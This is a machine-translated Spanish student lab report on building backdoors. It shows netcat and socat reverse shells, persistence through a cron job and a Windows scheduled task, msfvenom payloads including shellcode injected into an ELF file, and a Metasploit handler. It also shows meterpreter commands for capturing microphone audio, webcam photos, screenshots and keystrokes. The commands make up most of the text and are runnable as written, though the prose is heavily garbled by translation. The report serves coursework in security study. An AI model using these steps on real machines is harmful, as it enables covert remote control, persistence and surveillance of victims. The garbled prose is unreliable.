directorio
En primer lugar, la descripción del contenido y experimentales respondieron preguntas básicas
En segundo lugar, los instrumentos para preparar
- Ver WindowsIP y LinuxIP
- Ventanas get Linuxshell
- Linux obtener shell de Windows
- Transmitir datos utilizando nc
En tercer lugar, el proceso experimental
- Uso NETCAT obtener el huésped que opera Shell, inicio cron
- Uso Socat obtener el huésped que opera Shell, planes de comenzar la tarea
- Uso de MSF meterpreter (u otro software) para generar un archivo ejecutable, o el uso NCAT socat al host y se ejecutan para obtener el anfitrión Shell
- Uso de MSF meterpreter (u otro software) para generar el host de destino para obtener el contenido de audio, cámara, keyloggers, etc., y tratar de poner a la derecha
- Alternativamente puntos: Uso de la MSF generar el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell
En cuarto lugar, el problema con el pensamiento
En primer lugar, la descripción del contenido y las preguntas contestadas básicas experimentales
1, el contenido del experimento
(1) utilizando el anfitrión adquirido operativo netcat Shell, CRON START (0,5 min)
(2) el uso socat obtener el huésped que opera Shell, planes de lanzar la tarea (0,5 puntos)
(3) utilizando el meterpreter MSF (u otro software) para generar un archivo ejecutable, o el uso de NCAT socat transferidos a la del anfitrión y funciona un anfitrión adquiere Shell (0,5 min)
(4) mediante el meterpreter MSF (u otro software) para generar el host de destino adquiere contenido de audio, la cámara, y similares grabar las pulsaciones de teclado, y tratar de proporcionar a la derecha (2 minutos)
(5) más contenido opcional: MSF generado utilizando el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell (1 min), además de los contenidos de este experimento informe junto escrito.
2, contestar preguntas básicas
1) incluyen una puerta trasera que se pueda imaginar posibles formas de entrar en su sistema?
- Linux cuenta de equipo contraseña truco
- Reemplazar programa de inicio de sesión que proporciona contraseña especial Invisible Sign
- puerta trasera oculta en el sistema de archivos
(2) ¿Cómo sabes ejemplificado por la puerta de atrás para poner en marcha (ganar y Linux) forma?
- Linux: la función crontab por los troyanos para iniciar el temporizador, el panel de control será capaz de mantener el monitor de estado periódicamente iniciar la puerta de atrás, sino que también puede unirse a shellcode luego se inyecta normal y saludable abrir la puerta trasera.
- ganar: la aceptación pasiva de puertas traseras o descarga, cuando la parte lesionada clic para ejecutar los programas de puerta trasera aperturas.
Que le da una función de imagen profunda (3) Meterpreter allí?
- Funciones básicas (conectividad básica, la ejecución de instrucciones)
- Extensiones (como la recogida de información de los usuarios, los servicios de instalación y otras funciones)
(4) ¿Cómo encuentras el sistema no se ha instalado la puerta de atrás?
- Instalar el software antivirus: de protección en tiempo real.
- Detectar conexión de red: Comprobar para IP para establecer una conexión con la máquina.
En segundo lugar, los instrumentos para preparar
-
Ver WindowsIP y LinuxIP
-
Bajo el mando de Windows
ipconfig
-
Linux usando
ifconfig
-
Ventanas para conseguir shell de Linux
-
Uso NCAT programa, entrada de
ncat.exe -l -p 5224
supervisar el puerto 5224 de la máquina -
Mediante el comando nc en el kali
-e
opción, la entradanc 192.168.1.2 5224 -e /bin/sh
del puerto de conexión inversa de Windows 5224 anfitriones -
En el lado de Windows, cáscara de acceso del kali
Linux obtener shell de Windows
-
Uso
nc
del monitor de comandos5224
de puerto -
En Windows, utilice el
ncat.exe
del programa de-e
opción de alojar kali conexión inversa5224
puerto -
En este punto se puede ver pronta kali de comandos de Windows, se puede introducir el comando correspondiente de Windows (introduzca aquí
dir
)
Transmitir datos utilizando nc
-
monitores de Windows
5224
puerto -
Bajo Kali está conectada a un equipo con Windows
5224
puerto -
El establecimiento de una conexión de transmisión de datos
En tercer lugar, el proceso experimental
Uso NETCAT obtener el huésped que opera Shell, inicio cron
-
En monitores de Windows
5224
puerto -
En Kali, se lava con
crontab -e
editar una tarea programada, seleccione el editor3
-
Añadir una línea al final
24 * * * * /bin/netcat 192.168.1.2 5224 -e /bin/sh
, lo que significa que la conexión inversa de hosts de Windows a los 24 minutos de cada hora5224
del puerto -
14:24 tiempo en tiempo, se han obtenido en el kali shell, los comandos se pueden introducir
Uso Socat obtener el huésped que opera Shell, planes de comenzar la tarea
socat
Esncat
una versión mejorada del formato que utilizasocat [options] <address> <address>
, dos de los cuales dirección es obligatoria, y las opciones son opcionales.
socat función básica es la de crear dos datos de flujo de bytes bidireccionales se transmite entre los mismos, el parámetro es la dirección de los cuales representa una nueva dirección. El flujo de llamada representa el flujo de datos, y los datos puede tener muchos tipos diferentes, el comando requiere una serie de opciones para correspondientemente varios tipos de flujo de datos definidos y descritos.
-
En el sistema de win10, haga clic en la esquina inferior izquierda de la pantalla de iconos de Windows, seleccione "Administración de equipos" (o simplemente buscar "Administración de equipos")
-
Crear una tarea en el Programador de tareas, para rellenar el nombre de la tarea, y crear un nuevo disparador
-
En funcionamiento - Elija su> programa o script
socat.exe
ruta del archivo, agregar una columna para anotar los parámetrostcp-listen:5224 exec:cmd.exe,pty,stderr
, este comando hace escmd.exe
obligar al puerto5224
, mientras que elcmd.exe
de lastderr
redirección astdout
la -
Una vez creada, la tarea de descubrimiento está listo, pulse Windows + L llave para bloquear el ordenador cuando se abre de nuevo, encontrar la tarea que ha creado, haga doble clic, puede crear una tarea de descubrimiento antes de la carrera ha comenzado
-
En este punto, introduzca el comando en el entorno de Kali
socat - tcp:192.168.1.2:5224
, el primer argumento aquí-
representan la entrada estándar y de salida, la segunda corriente al puerto de Windows 5224 anfitrión, se puede encontrar en este momento ha obtenido con éxito una cáscara cmd
meterpreter MSF utilizando un archivo ejecutable utilizando NCAT socat o transferidos al huésped y el anfitrión de explotación adquiridos Shell
-
comando de entrada
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe
de generación de puerta traseraNota La dirección IP es LinuxIP
- El próximo Windows entrada en el modo de recepción
ncat.exe -lv 5224
>
20175224_backdoor.exe,
-
Linux ejecutado
nc 192.168.1.2 5224 < 20175224_backdoor.exe,
Nota Si cierra el software de matar el virusLa dirección IP de la máquina que es WindowsIP
-
Con éxito la transmisión y recepción de archivos
-
Kali terminal abierto, introducir
msfconsole
comandos en la consola de MSF -
Introducir
use exploit/multi/handler
en el módulo de monitor -
De entrada
set payload windows/meterpreter/reverse_tcp
configuración de carga útil -
Secuencialmente introducido
set LHOST 192.168.182.128
yset LPORT 5224
establecer la IP y el puertoTenga en cuenta que en este momento cuando la dirección IP especificada LinuxIP, y genera la misma puerta trasera IP
-
La instalación es completa, la escucha de inicio
exploit
-
Puerta trasera se ejecuta en Windows
-
kali ha recibido conexión de host de Windows, mando a distancia y conseguir la concha
MSF meterpreter adquirir el contenido usando el host de destino genera audio, cámara, pulsaciones registros
-
Use
record_mic
las instrucciones se pueden interceptar un (escritorio auricular porque la familia tenía ningún uso para él no puede lograrse) de audio -
Use
webcam_snap
las instrucciones se pueden utilizar la cámara para tomar fotografías (de escritorio en casa, porque la cámara no está configurado y por lo tanto no pueden ser alcanzados) -
Use
screenshot
las instrucciones pueden ser capturas de pantalla -
El uso de
keyscan_start
una instrucción para iniciar la grabación de las pulsaciones de teclas utilizando lakeyscan_dump
instrucción de lectura de las pulsaciones de teclas grabadas
Alternativamente puntos: Uso de la MSF generar el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell
-
Utilice el comando
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5224pwn
genera archivo de plantilla de código shell pwn1 este formato de archivo 5224pwn Elf (se hace referencia aquí https://www.cnblogs.com/clever-universe/p/8691365.html) - comando de entrada
msfconsole
en la línea de comandos MSF
uso exploit / multi / handler / * controlador en el modo de * / carga útil SET Linux / x86 / Meterpreter / reverse_tcp / * conjunto correspondiente a la generada puerta trasera * carga / Mostrar Opciones / * comprobar el estado actual de la información * / SET lhost 192.168.182.128 / * LHOST conjunto, donde ip es Linux * ip / del atacante del conjunto lport 5224 / * * conjunto lport / explotación / * iniciar el escucha * /
- Ejecute el archivo 5224pwn puerta trasera en kali,
在kali中执行pwn2时应先加权限 chmod +x 5224pwn
- En este punto el atacante Linux ha ganado conectado atacante Linux, y obtener una cáscara en el control remoto
En cuarto lugar, el problema con el pensamiento
Los problemas encontrados en el experimento
-
Pregunta 1: uso kali nc recuperarse después de la conexión de host no tiene ninguna pantalla
-
Problema 1 Solución: En el espacio en blanco, introduzca un comando, como
ls
etc., y luego pulse Intro
Experiencia Experimental
La puerta trasera que hacer es el experimento, el experimento de este principio que el primer experimento a ser más fácil de entender, pero debido a que desea utilizar para operar el software de modo que la primera vez será un poco de dificultad. A través de este experimento, mi dominio del conocimiento mejorado de manera significativa, puede aprender mucho de las cosas, esto es muy delicioso.
Los experimentos también se sienten muy interesante, deseando que llegue la próxima aprendizaje!